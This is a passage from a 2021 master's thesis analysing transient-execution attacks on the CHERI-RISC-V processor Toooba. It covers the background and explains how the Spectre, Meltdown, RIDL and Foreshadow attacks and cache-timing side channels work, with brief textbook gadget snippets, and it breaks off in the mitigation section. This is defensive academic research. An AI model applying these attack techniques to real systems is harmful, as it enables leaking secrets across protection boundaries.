Degree Project in Computer Science and Engineering, Second Cycle, 30 Credits
Stockholm, Sweden 2021
Analysis of Transient-Execution
Attacks on the out-of-order CHERI-
RISC-V Microprocessor Toooba
FRANZ ANTON FUCHS
KTH ROYAL INSTITUTE OF TECHNOLOGY
SCHOOL OF ELECTRICAL ENGINEERING AND COMPUTER SCIENCE
Master in Computer Science
Date: January 27, 2021
Supervisor: Roberto Guanciale
Examiner: Mads Dam
School of Electrical Engineering and Computer Science
Host Organisation: University of Cambridge Department of
Computer Science and Technology
Swedish title: Analys av transient-execution attacker på
out-of-order CHERI-RISC-V mikroprocessorn Toooba
Analysis of Transient-Execution Attacks on the out-of-order CHERI-RISC-V
Microprocessor Toooba
Copyright © 2021 by Franz Anton Fuchs
All rights reserved. No part of this work may be reproduced or used in any
manner without written permission of the copyright owner except for the use
of quotations.
Abstract
Research in recent years has shown transient-execution attacks to be a serious threat to microarchitectures. In this work, I reproduce and develop transient-execution attacks against RISC-V and CHERI-RISC-V microarchitectures. CHERI is an instruction set architecture (ISA) security extension that provides fine-grained memory protection and compartmentalisation. I conduct the transient-execution experiments for this work on Toooba – a superscalar out-of-order processor implementing CHERI-RISC-V. I present a new subclass of transient-execution attacks dubbed Meltdown-CF (Capability Forgery). Furthermore, I reproduce all four major Spectre-style attacks and important Meltdown-style attacks. This work analyses all attacks and explains the outcome of the respective experiments based on architectural and microarchitectural decisions made by their developers. While all four Spectre-style attacks could be reproduced successfully, the cores do not appear to be vulnerable to prior Meltdown-style attacks. I find that Spectre-BTB and Spectre-RSB, as well as the newly developed attack subclass Meltdown-CF, pose a large threat to CHERI systems. All four major Spectre-style attacks and all attacks of the Meltdown-CF subclass violate CHERI's security model and therefore require security mechanisms to be put in place.
Sammanfattning
Transient-execution-attacker har utgjort ett stort hot mot mikroarkitekturer i de senaste årens forskning. I den här avhandlingen återskapar jag och utvecklar transient-execution-attacker mot RISC-V- och CHERI-RISC-V-mikroarkitekturer. CHERI är en instruction set architecture (ISA) security extension som ger finkornig memory protection och compartmentalisation. I avhandlingen genomför jag transient-execution-experiment på Toooba – en superskalär out-of-order-processor som implementerar CHERI-RISC-V. Jag presenterar en ny sorts transient-execution-attack som kallas Meltdown-CF (Capability Forgery). Därutöver har jag återskapat de fyra stora Spectre-style-attackerna och viktiga Meltdown-style-attacker. I avhandlingen analyserar jag dessa attacker och förklarar resultaten från experimenten utifrån de arkitektoniska och mikroarkitektoniska beslut som tagits av respektive utvecklare. Medan de fyra Spectre-style-attackerna kunde återskapas med framgång verkar processorkärnorna inte vara sårbara för tidigare Meltdown-style-attacker. Jag kommer fram till att Spectre-BTB och Spectre-RSB, såväl som den nya sortens transient-execution-attack Meltdown-CF, utgör ett stort hot mot CHERI-system. De fyra stora Spectre-style-attackerna och alla attacker av Meltdown-CF-typen bryter dock mot CHERI:s säkerhetsmodell och kräver därmed att säkerhetsmekanismer införs.
Acknowledgements
I would like to thank:
• Simon W. Moore, my supervisor at Cambridge, who – even though the
circumstances were not in our favour – believed in me and gave me the
opportunity to conduct my work remotely. Furthermore, he provided
lots of feedback throughout close and regular supervision sessions.
• Jonathan Woodruff, my advisor, who spent many hours explaining various concepts to me, was always happy to discuss my ideas, and provided feedback and inspiration that heavily influenced my work.
• Peter Rugg, Alexandre Joannou, Jessica Clarke, Marno van der Maas,
and others who assisted me in solving a wide range of problems and
made me rethink my approaches and ideas.
• Robert N. M. Watson and the entire CHERI team who warmly welcomed
me into the team and created a helpful and encouraging atmosphere.
• Roberto Guanciale, my supervisor at KTH, who made it possible to con-
duct this thesis work within the CHERI group and supported me through
the entire process by providing important high-level feedback.
Contents
1 Introduction 1
1.1 Research Question and Scope . . . . . . . . . . . . . . . . . . . 2
1.2 Contributions . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
1.3 Figures and Permissions . . . . . . . . . . . . . . . . . . . . . . 2
1.4 Outline . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
2 Background 4
2.1 Microarchitectural Background . . . . . . . . . . . . . . . . . . 4
2.1.1 RISC-V . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
2.1.2 Caches and Memory . . . . . . . . . . . . . . . . . . . 6
2.1.3 Out-of-order Execution . . . . . . . . . . . . . . . . . . 6
2.1.4 Speculative Execution . . . . . . . . . . . . . . . . . . 7
2.1.5 Memory Disambiguation . . . . . . . . . . . . . . . . . 9
2.2 Transient-Execution Attacks . . . . . . . . . . . . . . . . . . . 9
2.2.1 Spectre Attacks . . . . . . . . . . . . . . . . . . . . . . 10
2.2.2 Meltdown Attacks . . . . . . . . . . . . . . . . . . . . . 13
2.2.3 Timing Side Channels . . . . . . . . . . . . . . . . . . 15
2.3 Security Mechanisms . . . . . . . . . . . . . . . . . . . . . . . 15
2.3.1 Tagging Microarchitectural State . . . . . . . . . . . . 16
2.3.2 Special Instructions . . . . . . . . . . . . . . . . . . . . 16
2.4 CHERI . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
2.4.1 CHERI Abstract Model . . . . . . . . . . . . . . . . . 17
2.4.2 CHERI-RISC-V . . . . . . . . . . . . . . . . . . . . . . 21
2.4.3 CHERI-RISC-V Hardware . . . . . . . . . . . . . . . . 22
2.4.4 CHERI Software Stack . . . . . . . . . . . . . . . . . . 22
2.4.5 CHERI Security Model . . . . . . . . . . . . . . . . . 23
2.5 Related Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
3 Methods 26
3.1 Toooba . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26
3.2 Research Methodology . . . . . . . . . . . . . . . . . . . . . . 28
3.3 Common Mechanisms . . . . . . . . . . . . . . . . . . . . . . . 29
3.3.1 Flushing Caches . . . . . . . . . . . . . . . . . . . . . . 29
3.3.2 Timing Measurements . . . . . . . . . . . . . . . . . . 30
4 RISC-V Results 32
4.1 Spectre Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
4.1.1 Spectre-PHT . . . . . . . . . . . . . . . . . . . . . . . . 33
4.1.2 Spectre-PHT-Write . . . . . . . . . . . . . . . . . . . . 34
4.1.3 Spectre-BTB . . . . . . . . . . . . . . . . . . . . . . . . 34
4.1.4 Spectre-RSB . . . . . . . . . . . . . . . . . . . . . . . . 34
4.1.5 Spectre-STL . . . . . . . . . . . . . . . . . . . . . . . . 35
4.2 Meltdown Attacks . . . . . . . . . . . . . . . . . . . . . . . . . 36
4.2.1 Meltdown-US . . . . . . . . . . . . . . . . . . . . . . . 36
4.2.2 Meltdown-GP . . . . . . . . . . . . . . . . . . . . . . . 37
5 CHERI-RISC-V Results 38
5.1 Spectre Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . 38
5.1.1 Spectre-PHT . . . . . . . . . . . . . . . . . . . . . . . . 38
5.1.2 Spectre-PHT-CHERI-Write . . . . . . . . . . . . . . . 41
5.1.3 Spectre-BTB on CHERI-Sandboxes . . . . . . . . . . 41
5.1.4 Priv-Mode Attacks . . . . . . . . . . . . . . . . . . . . 45
5.1.5 Spectre-RSB . . . . . . . . . . . . . . . . . . . . . . . . 46
5.1.6 Spectre-STL . . . . . . . . . . . . . . . . . . . . . . . . 48
5.2 Meltdown Attacks . . . . . . . . . . . . . . . . . . . . . . . . . 49
5.2.1 Meltdown-US-CHERI . . . . . . . . . . . . . . . . . . 49
5.2.2 Meltdown-GP-CHERI . . . . . . . . . . . . . . . . . . 50
5.2.3 Meltdown-CF . . . . . . . . . . . . . . . . . . . . . . . 51
6 Discussion 58
6.1 SinglePCC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 58
6.1.1 Mechanism . . . . . . . . . . . . . . . . . . . . . . . . 58
6.1.2 Testing SinglePCC . . . . . . . . . . . . . . . . . . . . 59
6.1.3 Hardening SinglePCC . . . . . . . . . . . . . . . . . . 60
6.1.4 Spectre-BTB in Kernel Code . . . . . . . . . . . . . . 62
6.2 Preventing Meltdown-CF . . . . . . . . . . . . . . . . . . . . . 63
6.3 Ethics and Sustainability . . . . . . . . . . . . . . . . . . . . . 64
6.4 Future Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 64
7 Conclusions 66
Bibliography 67
A Full C Attack 73
B Full CHERI-RISC-V Attack 78
Acronyms
ABI Application Binary Interface
ALU Arithmetic Logic Unit
ASID Address Space Identifier
ASR Access System Registers
BHT Branch History Table
BOOM Berkeley Out-of-Order Machine
BTB Branch Target Buffer
CHERI Capability Hardware Enhanced RISC Instructions
CID CHERI Compartment Identifier
CISC Complex Instruction Set Computing
CSR Control and Status Register
DDC Default Data Capability
FPGA Field Programmable Gate Array
FPU Floating Point Unit
HDL Hardware Description Language
ILP Instruction-Level Parallelism
IR Intermediate Representation
ISA Instruction-Set Architecture
LFB Line Fill Buffer
LLC Last Level Cache
LSB Least Significant Bit
LSQ Load-Store Queue
MMU Memory Management Unit
MSB Most Significant Bit
PCC Program Counter Capability
PHT Pattern History Table
PTE Page Table Entry
RAS Return Address Stack
RIDL Rogue In-Flight Data Load
RISC Reduced Instruction Set Computing
ROB Reorder Buffer
ROP Return-Oriented Programming
RSB Return Stack Buffer
SCR Special Capability Register
STL Store-To-Load
SUM Supervisor User Memory
TLB Translation Lookaside Buffer
Chapter 1
Introduction
Memory safety has long been one of the most difficult problems in secure computing. The Heartbleed bug is a good example of the severity of memory-safety problems and illustrates the need for strong memory safety [1]. One approach to mitigating these kinds of vulnerabilities is Cyclone – a dialect of C that aims to achieve memory safety [2]. Similar approaches are CCured [3], which aims to enhance the type safety of C programs, and Checked C [4], which helps to guarantee spatial memory safety for C programs.
Another approach to memory safety is in-memory capability systems, which mediate memory accesses through capabilities in place of integer addresses. The idea of capability systems is not new but has existed for more than forty years, e.g., the CAP Computer [7] or Ackerman's architecture [8]. However, capability systems have never been commercially successful. The CHERI project, started in 2010, revived the idea of capability systems and has had a large impact on the field. The main idea of CHERI is to enforce spatial and temporal memory safety effectively, and CHERI systems can thus mitigate attacks targeting spatial or temporal memory-safety vulnerabilities. However, in January 2018, a new class of attacks called transient-execution attacks was published. These attacks had a major impact on the processor industry and pose a large threat to CHERI systems, as they can circumvent the security mechanisms in place. Transient-execution attacks have only partly been evaluated on RISC-V and not at all on CHERI-RISC-V systems. This thesis aims to answer whether these attacks are possible on RISC-V and CHERI-RISC-V systems.
1.1 Research Question and Scope
The main research question evaluated throughout this thesis is: Is the out-of-order CHERI-RISC-V processor Toooba vulnerable to transient-execution attacks? In order to answer that question, I attempt to reproduce all major transient-execution attacks on both RISC-V and CHERI-RISC-V. This work is limited to attacks in which transiently executed instructions reveal secrets. Attacks that infer information about a program's state without transient execution, e.g., BranchScope [9], are not part of this thesis work.
Developing and implementing mitigation mechanisms is out of scope. However, it is part of this work to point out possibilities for mechanisms that could be implemented. Furthermore, I consider it in scope to test whether existing mitigation mechanisms effectively mitigate transient-execution attacks. It is out of scope, however, to thoroughly evaluate mitigation mechanisms, including a performance analysis and an assessment of each mechanism's advantages and drawbacks.
1.2 Contributions
In this work, I make the following contributions:
• The first work to completely reproduce the major transient-execution attacks on a RISC-V microarchitecture.
• The first work to reproduce the major transient-execution attacks on a CHERI-RISC-V microarchitecture.
• The development of Meltdown-CF, a new subclass of transient-execution attacks.
• An extensible framework for exploring transient-execution attacks, providing a platform for researching mitigation mechanisms in RISC-V and CHERI-RISC-V microarchitectures.
• Testing and hardening of the SinglePCC implementation in Toooba.
1.3 Figures and Permissions
All figures with a citation are used with the permission of the publisher. Figures without a citation were created by me.
1.4 Outline
In Chapter 2, I explain the background of this thesis work including modern
microarchitectures, transient-execution attacks, and the CHERI-RISC-V ar-
chitecture. In the next chapter, I present the research methods applied in the
course of this thesis. This will be followed by Chapter 4 and Chapter 5, which
give an overview of the attacks included in the framework for RISC-V and
CHERI-RISC-V microarchitectures, respectively. Chapter 6 will discuss the
results and their implications. The thesis will be concluded in Chapter 7.
Chapter 2
Background
In this chapter, I introduce the microarchitectural background of transient-
execution attacks followed by the attacks themselves. Next, I describe CHERI
systems, which will be the basis for the research done throughout the thesis
work.
2.1 Microarchitectural Background
Microarchitectures use sophisticated mechanisms to improve overall performance. In industry, the focus has been on performance rather than security. This led to the emergence of transient-execution attacks, which exploit these mechanisms. This section describes RISC-V and the microarchitectural mechanisms that form the basis of transient-execution attacks.
2.1.1 RISC-V
RISC-V [10] is an extensible open-source Instruction-Set Architecture (ISA)
that has received a great deal of attention in academia and is gaining traction
in industry. An ISA describes an abstract model of the computer including
the architectural state of the machine, instructions to change the state, regis-
ters, memory access, and other input/output specifications. It is important to
distinguish between the terms architecture and microarchitecture. A microar-
chitecture is an implementation of an architecture. Therefore, binary compati-
bility exists between microarchitectures that implement the same architecture.
A program causes visible changes to the architectural state, but the microar-
chitectural state is mainly invisible to the program.
The RISC-V ISA is a Reduced Instruction Set Computing (RISC) architecture, which means that it aims for a small set of instructions, each performing only one task. In contrast, instructions on Complex Instruction Set Computing (CISC) architectures can perform several operations within a single instruction. RISC-V has similarities to other RISC architectures, e.g., MIPS and ARM, but differs mainly through its modular nature. The unprivileged specification [11], which covers the user-space instructions, describes a minimal instruction set – the base integer instruction set – that must be implemented by every microarchitecture, as well as several optional extensions. This is why RISC-V is considered a design space.
The current unprivileged specification defines 13 extensions [11]. Widely implemented are the standard extensions for integer multiplication and division, atomic instructions, single-precision floating-point, double-precision floating-point, and compressed instructions. RISC-V extensions are abbreviated with capital letters, e.g., A for the standard extension for atomic instructions. Furthermore, RISC-V defines three register widths: 32, 64, and 128 bits. RISC-V microprocessors carry a name tag that specifies which extensions and features of RISC-V they implement, e.g., RV32IACMU, where RV32 stands for RISC-V with 32-bit-wide registers and the following capital letters identify the instruction-set extensions the microprocessor implements. The capital letter G refers to the general-purpose ISA, which includes the integer, multiplication and division, atomic, single-precision floating-point, and double-precision floating-point extensions, abbreviated as "IMAFD".
The RISC-V privileged specification [12] defines three privilege modes: M(achine), S(upervisor), and U(ser). One additional privilege mode might be added in the future, as it is held reserved in the specification. Machine mode is the highest privilege level and user mode the lowest. As with the base integer instruction set, every RISC-V implementation must implement machine mode; implementing the other modes is an implementation choice. When supervisor mode is implemented, this is indicated by an S in the name tag; for user mode, the letter U is added. In machine mode, addresses are interpreted as physical addresses. In supervisor mode, address translation is performed. The main information for address translation, e.g., the Address Space Identifier (ASID), is stored in the satp register – the supervisor address translation and protection register. The privileged RISC-V architecture manual [12] specifies 32-bit, 39-bit, and 48-bit-wide virtual addresses.
Machine mode and supervisor mode define new registers for special purposes, called Control and Status Registers (CSRs) in RISC-V. These registers are used to obtain information about the microarchitecture, but also to control the architecture, e.g., for trap handling. The chapters Machine-Level ISA and Supervisor-Level ISA of the privileged specification [12] contain further information on exception handling and related topics.
2.1.2 Caches and Memory
DRAM access times are slow compared to the clock frequency of the processor. If every load issued by the processor had to pay the full DRAM latency, performance would decrease significantly. This creates the need for low-latency memory. One solution is caches, which hold the most recently accessed data. Access times to these data are small, but access times for data not stored in caches remain large. Modern processors have multiple cache levels that differ in size, speed, and cost. The Level-1 (L1) cache has the fastest access time but is also the smallest. The cache on the highest level – also referred to as the Last Level Cache (LLC) – has the slowest access time but can store the most data. In general, the greater the level number, the slower the access time, but the more data the cache can store. Caches store memory in the form of cache lines; one cache line contains multiple adjacent memory words. Many modern processors have inclusive caches, meaning that every cache line stored in a lower level is also present in every cache level above it. In modern processors, every core has its own L1 cache, and the LLC – the slowest and biggest cache – is shared among all cores. The intermediate caches may be exclusive to a core or shared, depending on the vendor's policy. Furthermore, caches exploit the principle of locality that programs exhibit. Temporal locality arises when a program accesses memory at the same address more than once; spatial locality arises when the program accesses memory at addresses near one already accessed. By storing the cache lines of the most recently accessed data, caches improve performance for programs that exhibit both temporal and spatial locality.
2.1.3 Out-of-order Execution
A microprocessor executes a program, which is defined by a sequence of instructions as written by the programmer. This order of instructions defines the program's behaviour and is called in-order or program order. Simple microprocessors execute one instruction after another in this order. Modern microprocessors, however, incorporate out-of-order execution, which means that instructions are not executed in order microarchitecturally. This is done to enhance performance. The principle of out-of-order execution is based on the fact that instructions that do not depend on each other can be executed in parallel and in arbitrary order, as the final result will not change. The first algorithm for full out-of-order execution was demonstrated by Tomasulo [13].
The main goal of modern processors is to hide the latency of instructions, e.g., loads and stores that miss the L1 data cache, and to extract Instruction-Level Parallelism (ILP) by executing other independent instructions in the meantime. This increases the overall performance of the microprocessor. Out-of-order execution increases the divergence between the architectural and microarchitectural state. An instruction becomes visible when it changes the architectural state. Instructions must become visible in program order; otherwise the new state diverges from a valid architectural state, which means that a different program behaviour appears. An instruction retires – also called commits – in the cycle in which it changes the architectural state. Instructions commit in sequential order, matching the programmer's model presented in the ISA.
2.1.4 Speculative Execution
An important performance criterion is to keep the processor's pipeline filled at all times, for which the processor needs to fetch the correct instructions. The control flow of a program depends on multiple parameters, including user input. Control flow is steered by direct and indirect branches in machine code. A direct branch is a jump to an address determined by an offset encoded in the branch instruction. An indirect branch is a jump to a value stored in a register. To fetch the correct instructions, the microprocessor would need to know whether a branch is taken and what its jump target is, which is not possible in general. Therefore, modern processors use branch prediction: the processor predicts the information it needs and, following its prediction, executes the instructions it believes are correct. If the processor's prediction turns out to be right, meaning that the predicted values match the program's real values, the instructions can commit; otherwise, the instructions are rolled back. Speculative execution is therefore not visible on the architectural level. If the microprocessor's speculation is successful, this can lead to a large performance gain. A speculative microprocessor has special units that handle prediction; they differ in which kinds of branches they are responsible for predicting.
Branch Predictors
Branch prediction can be either static or dynamic. A static branch predictor always makes the same decision and does not change during the runtime of a program. A dynamic branch predictor, on the other hand, may change its prediction as it learns at runtime. I focus on dynamic branch prediction, as it is the most widely used technique in modern microprocessors. A branch predictor mainly consists of two subunits. The Pattern History Table (PHT) stores the history of a particular branch; with that information, the processor predicts whether the branch is taken or not. The PHT can be either local or global: a local PHT stores only the history of one branch, e.g., strongly taken, whereas a global PHT also takes other branches and their outcomes into account. The processor also has a Branch Target Buffer (BTB), which stores the branch target – the location the control flow will go to if the branch is taken. A microprocessor can also implement both local and global PHTs and choose at runtime which one to use depending on the misprediction ratio; this is called a tournament predictor [14].
In most microprocessors, branch prediction covers all direct and indirect branch instructions with the exception of call and return instructions, which are handled by separate logic as presented below. However, both instructions can also be placed in the BTB, e.g., as a mitigation mechanism against attacks or because the microprocessor lacks dedicated logic for them.
Return Stack Buffers
A Return Stack Buffer (RSB) – also called a Return Address Stack – is a hardware buffer for return addresses. For every function call, the return address is pushed onto this stack; every return instruction pops one return address. The return address is also stored on the software stack. The main goal of an RSB is to enhance performance: loading the return address from the software stack can lead to stall cycles, e.g., because the branch needs to be taken early in the pipeline while the load can only be performed later. Therefore, microprocessors use an RSB to predict the return address and keep the pipeline filled with instructions. If the address from the RSB matches the one on the software stack, a performance gain is achieved; otherwise, the speculatively executed instructions are rolled back.
sd t0, 0(a0)
ld t1, 0(a1)
Figure 2.1: The RISC-V store and load instructions are dependent if a0 and a1
are resolved to the same physical address.
2.1.5 Memory Disambiguation
When reordering instructions, the microprocessor has to ensure that it does not break any dependencies. For a store and a load operation, a true dependency exists if the load returns the value written to memory by a preceding store to the same address. The store and load operations shown in Figure 2.1 are dependent if a0 and a1 resolve to the same physical address. The process of detecting true dependencies between memory operations is called memory disambiguation. However, at the point of reordering, the microprocessor might not know the full addresses yet, e.g., because they are being loaded from memory and those loads have not finished, or because the register is being updated and will be made available on a forwarding path. The microprocessor therefore cannot guarantee that such instructions are independent. Yet, to achieve high performance, loads have to be executed as early as possible so that a possible miss penalty can be hidden. To enhance performance, modern microprocessors use memory disambiguation with speculation, as first presented by Gallagher et al. [16]: the microprocessor assumes that the load does not depend on the store and speculatively executes the load, and the instructions dependent on it, before the store. When the address of the store is resolved, the microprocessor checks whether there in fact is a dependency and, if so, re-executes the load and its dependent instructions.
2.2 Transient-Execution Attacks
Transient instructions are instructions that are erroneously executed by the processor due to out-of-order or speculative execution and that would not have been executed otherwise. Transient execution is not visible on the architectural level: transient instructions should not have been executed, are rolled back, and never commit to the architectural state. However, transient execution has effects on the microarchitectural state, and these state changes can be read through side channels. This is the basis of transient-execution attacks: they trick the microprocessor into executing several instructions transiently and then gain knowledge through side channels. The most commonly used side channel for these attacks is timing. Other side channels exist, such as power consumption or heat dissipation, but in this work I use only timing side channels. This choice is supported by the literature on transient-execution attacks, in which timing side channels have proved effective [18, 19, 20]. Transient-execution attacks can be subdivided into Spectre attacks and Meltdown attacks [19]. More sophisticated classifications [20] exist but are not needed for this thesis work.
2.2.1 Spectre Attacks
Spectre attacks focus on microarchitectural state changes due to misprediction of control or data flow. They were first demonstrated by Kocher et al. [22] and can be further subdivided into four categories according to which part of speculative execution they exploit.
Spectre-PHT
As the name suggests, Spectre-PHT attacks the Pattern History Table. The basic attack principle is to train the history of a branch such that the prediction's outcome follows the attacker's intentions. A simple example – derived from [22] – is shown in Figure 2.2. The if statement will result in a branch instruction. The attacker's first step is to train the PHT of this branch so that it is strongly predicted not-taken, which means that the condition is predicted to evaluate to true. This can be accomplished by calling the code containing the if statement with values of the index i that are less than array_size. The next step is to conduct the actual attack: the attacker can provide any desired value for i, as branch prediction will speculatively execute the body of the if statement. The attacker can thus trick the microprocessor into executing an arbitrary load without a prior bounds check. Using the value loaded from sec_arr as an index into a user-accessible array usr_arr changes the microarchitectural state. Later, the microprocessor detects the misprediction and rolls back the instructions; however, the microarchitectural side effects have already taken place and stay visible even though none of the speculatively executed instructions committed. Spectre-PHT is also known as Spectre v1 and is presented as such in [22].
int j;
int r = 0;
if (i < array_size)
{
j = sec_arr[i];
r = usr_arr[j];
}
Figure 2.2: Spectre-PHT example written in C.
Spectre-BTB
Opposed to Spectre-PHT, Spectre-BTB attacks the Branch Target Buffer. A
BTB has only a limited number of entries. Therefore, the target address of
a branch instruction has to be mapped to an entry by a hash function. In the
original form as demonstrated by Kocher et al. [22] the small size of the BTB is
exploited by attackers. Because of the small size of the BTB, the hash function
can lead to frequent collisions. When a branch is seen by the microprocessor, it
looks up the corresponding entry in the BTB and uses this target address for the
prediction. As for Spectre-PHT, Spectre-BTB consists of two phases. First, the
attacker injects a malicious branch target into the BTB at the entry of a branch
executed by the victim program. Figure 2.3 shows two branch instructions,
which I assume to be mapped to the same BTB entry. The injection can be done
by executing the second branch instruction, which will overwrite the entry of
the first one. In the second phase, the attacker triggers the first instruction
to be executed. Speculatively, the branch target address in the BTB entry –
which is the branch target of the second branch instruction – will be used and
the control-flow will be speculatively directed there. This target is attacker
controlled and will leak the desired information. This variant is called out-of-
place Spectre-BTB.
Another variant is in-place Spectre-BTB. In this case, only one branch instruction is used. The attacker manages, e.g. through user input, to poison the BTB entry of this branch instruction. The next time the code containing this branch instruction is executed, the branch prediction will speculatively direct the control-flow to attacker-intended code, which the attacker can use to leak information. Spectre-BTB is also known as Spectre v2 and presented as such in [22].
00000008: 00060067 jr a2
...
00001008: 00078067 jr a5
Figure 2.3: Indirect jumps mapped to the same BTB entry.
Spectre-RSB
Spectre-RSB attacks were discovered later than the original Spectre attacks
and aim to attack speculative execution involving the Return Stack Buffer [23,
24]. There exist multiple flavours of this attack that exploit subtleties of a particular microarchitecture, but all share the same goal: Spectre-RSB attacks target a mismatch between the address on the hardware return stack and the address on the software return stack. The microprocessor will
use the address in the RSB and speculatively direct the control-flow there. The
attack consists of an injection phase, which changes the entry at the current index of the RSB, and a side-channel sending phase, which triggers side effects by speculatively returning to the injected address.
Spectre-STL
Spectre-Store-To-Load (STL) differs substantially from the other Spectre attacks as it does not attack control-flow, but data flow. As described in Section 2.1.3, the microprocessor wants to execute load instructions as early as possible
to hide the load penalty. A load instruction can pass a store instruction if they
are independent. Load and store instructions are independent if their mem-
ory addresses differ. However, memory addresses might not be fully available
to the microprocessor when it needs to make the decision whether the load
is allowed to pass. Therefore, the microprocessor speculates whether the ad-
dresses are independent. Sophisticated processors have dedicated memory dis-
ambiguation logic for this purpose as described in Section 2.1.5. An example
of the attack is shown in Figure 2.4. The first step is to trick the microproces-
sor into predicting that addr1 and addr2 are different. Then the load from
addr2 will speculatively be executed before the store to addr1. In the ex-
ample, the memory is overwritten with zeros at this address. The attacker can
manage to speculatively read out the stale data before it is overwritten. This attack is also known as Spectre v4 and was first demonstrated by Horn [25].
*addr1 = 0x00;
val = *addr2;
Figure 2.4: Spectre-STL example in C.
Rogue In-Flight Data Load
Rogue In-Flight Data Load (RIDL) [26] is an attack on microprocessors that use Line Fill Buffers (LFBs). An LFB prevents a cache from blocking when a miss occurs. In order to achieve their performance goals, microprocessors speculatively use in-flight store data for loads without checking permissions first. A store is in flight when it is currently in the LFB but has not committed yet, e.g., due to a cache
miss. Another process running on the same hardware thread can observe this
in-flight store by performing a random load and leak its value through a side
channel. The general attack idea is as follows: A victim process performs a
memory access to secret data. This memory access will be handled via LFBs
and an entry holding the secret data will be allocated. Next, an attacker per-
forms a memory access, which will be speculatively satisfied by an LFB entry.
This returns the secret data to the attacker who uses it as an index to a buffer.
This will load a line into the caches and therefore reveals the secret value to
the attacker. Eventually, the processor will roll back the execution because of
misspeculation, but the effects to the cache will remain. With this attack, one
can leak entire pages from another running process.
2.2.2 Meltdown Attacks
Meltdown attacks focus on microarchitectural state changes due to transient
execution of instructions following a faulting instruction. Therefore, Melt-
down attacks do not attack branch prediction features of the microprocessor,
but out-of-order execution. They also rely on the point at which access rights are checked and hardware exceptions are raised.
Meltdown-US
The original Meltdown attack – demonstrated by Lipp et al. [27] – seeks to
access a page for supervisor use only from user space. Therefore, this attack
is also called Meltdown-US – User/Supervisor. The goal of the attack is to
read out supervisor-only memory without a sufficient privilege level. The attack exploits the fact that the supervisor-only protection is not checked when the page is actually accessed, but in later pipeline stages. Eventually this
instruction will fault and raise a hardware exception, but in the meantime tran-
siently executed instructions following the faulting instruction will reveal the
sought value through side channels. By conducting this attack multiple times,
an attacker can read out the entire kernel of an operating system [27].
Foreshadow Attacks
Van Bulck et al. presented Foreshadow [28], which has the same goal as
Meltdown-US – reading out data without having permission to do so. How-
ever, Foreshadow is targeting Intel SGX enclaves [29] and exploits a different
mechanism than Meltdown. Foreshadow is tailored to microprocessors that
do not allow large speculation windows and where the data to be leaked must
reside in the L1 cache. However, it is possible to access the L1 cache specula-
tively even though access is denied. This is caused by the fact that data access and permission checks are conducted in parallel in an exploitable microprocessor [30]. Therefore, even though access is denied, the value is fetched into a
register and can be leaked through a side channel. Later, Weisse et al. [31]
presented Foreshadow-NG, an extension of Foreshadow that allows breaking the virtual memory abstraction of operating systems and hypervisors.
Meltdown-GP
The GP – General Protection – variant of Meltdown enables an attacker to
access privileged system registers. When accessing a system register, the mi-
croprocessor will check whether the current privilege is sufficient to access it.
If this is not the case, an exception will be thrown. Meltdown-GP exploits that
some microarchitectures throw the exception late or allow computation on the
system register value before execution of the instruction sequence is stopped. This allows the attacker to leak the system register’s value through a side channel.
This attack was erroneously named Spectre v3a in early documents [32,
33].
Meltdown-RW
Meltdown-US demonstrated that supervisor memory can be read out without
sufficient privilege level. Kiriansky and Waldspurger [34] introduced a new
attack initially called Spectre v1.2. This attack seeks to write to pages that are
marked as read-only. The functioning of this attack is similar to Meltdown-
US. The attacker writes to the read-only page, and further transient instructions follow until the exception is thrown by the processor. The difference is that the transient execution takes place in another process: the speculative write of one process tricks another process into leaking secret information. Following Canella
et al. [19], this attack uses a transient-execution sequence after a faulting in-
struction. Therefore, it is referred to as Meltdown-RW – Read/Write.
2.2.3 Timing Side Channels
Measuring how long a certain instruction sequence needs to execute is a well-
known and often used side channel. The attacker measures the execution time
and compares it to a reference time. Based on that, the attacker decides which
information has been gained. In theory, any sequence of instructions can be used for timing measurements, but in practice only instruction sequences whose execution times deviate significantly between runs are used. Often the access time of load operations is measured. A load will commit earlier if it hits in a cache and therefore decreases the overall execution time. Otherwise, the load will have to go
to the DRAM and the execution time will be longer. Most transient-execution
attacks demonstrated up to now use the FLUSH+RELOAD [18] attack. Here,
the attacker flushes the Last Level Cache (LLC), which is shared between all
cores. Next, the victim will run and load at least one cache line based on the
secrets it computes on. After the victim has been executed, the attacker reloads
an entire buffer. If certain loads are faster than others, the attacker knows that
the victim has accessed the corresponding cache line. This allows the attacker to leak the secret value the victim computed on.
2.3 Security Mechanisms
In order to mitigate transient-execution attacks, academia and industry have come up with many security mechanisms. The first generation of security mechanisms was implemented in software, as software mitigations could be deployed easily and quickly. Next, many hardware mechanisms were proposed and implemented
in the following generation of microarchitectures. In this section, I summarise
the most important principles of hardware-based mitigation mechanisms. An-
other mitigation mechanism – SinglePCC – will be explained in Section 6.1.
2.3.1 Tagging Microarchitectural State
A class of mitigation mechanisms is to tag parts of the microarchitecture with
special values. Tagging parts of the microarchitecture prevents sharing mi-
croarchitectural state between protection domains that are not supposed to
share information with each other. For CHERI systems, the CHERI Compart-
ment Identifier (CID) is a tagging mitigation mechanism that has originally
been presented by Watson et al. [21]. A CID is an integer that uniquely iden-
tifies a compartment and is held in hardware. The idea is to add a field to
each BTB entry that is big enough to hold the CID. When a prediction is made
in the processor, the CID of the compartment currently running on the core
is compared to the respective entry of the BTB. If they match, the prediction
will be deemed trustworthy and the core will speculatively jump to the target.
Otherwise, the core will throw away the prediction results and will wait until
the jump target has been successfully resolved. Similar changes have to be
made for predictions coming from the RSB.
The CID mechanism successfully stops attacks that want to cross protec-
tion domains. A good example of an attack being mitigated is the attack on sandboxes described in Section 5.1.3. Tagging microarchitectural state
has also been adopted by industry, e.g., by Arm in the introduction of Arm
v8.5-A. The approach applied by Arm is to tag its microarchitecture and also to provide special registers that either allow or disallow using branch prediction results from one context in another. This has been implemented in
multiple processors, for example, the Cortex-A77 [36].
2.3.2 Special Instructions
Another option to mitigate transient-execution attacks is to give the users con-
trol of how much they want to share with other compartments. This can be
done by changing the ISA and adding new instructions. This puts the user or
